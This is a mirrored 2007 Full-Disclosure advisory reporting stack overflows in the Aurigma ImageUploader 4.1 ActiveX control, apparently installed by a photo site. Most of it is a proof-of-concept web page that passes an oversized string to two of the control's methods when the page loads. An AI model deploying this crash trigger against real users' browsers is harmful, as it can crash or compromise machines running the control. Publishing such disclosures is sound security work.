Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18477
HistoryNov 22, 2007 - 12:00 a.m.

[Full-disclosure] Aurigma ImageUploader 4.1 Multiple stack overflows

2007-11-2200:00:00
vulners.com
8

There are multiple stack overflows in the Aurigma ImageUploader 4.1 ActiveX control. I believe this control was installed by www.dotphoto.com. PoC as follows:


<!–
written by e.b.
–>
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";

 while &#40;s.length &lt; 999999&#41; s=s+s;

 var obj = new ActiveXObject&#40;&quot;Aurigma.ImageUploader.4.1&quot;&#41;; //{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
  obj.GotoFolder&#40;s&#41;;
  obj.CanGotoFolder&#40;s&#41;;

}
</script>

</head>
<body onload="JavaScript: return Check();">
</body>
</html>


Elazar


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/